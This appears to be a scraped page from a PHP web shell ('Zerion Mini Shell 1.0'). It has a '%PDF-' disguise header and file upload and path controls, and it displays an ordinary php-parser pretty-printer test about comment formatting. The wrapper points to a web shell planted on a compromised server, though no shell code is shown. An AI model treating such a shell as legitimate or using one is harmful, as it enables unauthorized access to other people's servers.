%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/kpk/api/vendor/nikic/php-parser/test/code/prettyPrinter/
Upload File :
Create Path :
Current File : /var/www/html/kpk/api/vendor/nikic/php-parser/test/code/prettyPrinter/comments.test

Comments
-----
<?php

function justForIndentation()
{
    // Some text
    # Some text
    /* Some text */
    /** Some text */
    /**
     * Some text.
     * Some more text.
     */
    /*
     * Some text.
     * Some more text.
     */
    /*
        Some text.
        Some more text.
    */
    /* Some text.
       More text. */
    /* Some text.
       More text.
       Even more text. */
    $foo;
}
-----
function justForIndentation()
{
    // Some text
    # Some text
    /* Some text */
    /** Some text */
    /**
     * Some text.
     * Some more text.
     */
    /*
     * Some text.
     * Some more text.
     */
    /*
        Some text.
        Some more text.
    */
    /* Some text.
       More text. */
    /* Some text.
       More text.
       Even more text. */
    $foo;
}
-----
<?php

function test()
{
    // empty
}
-----
function test()
{
    // empty
}

Zerion Mini Shell 1.0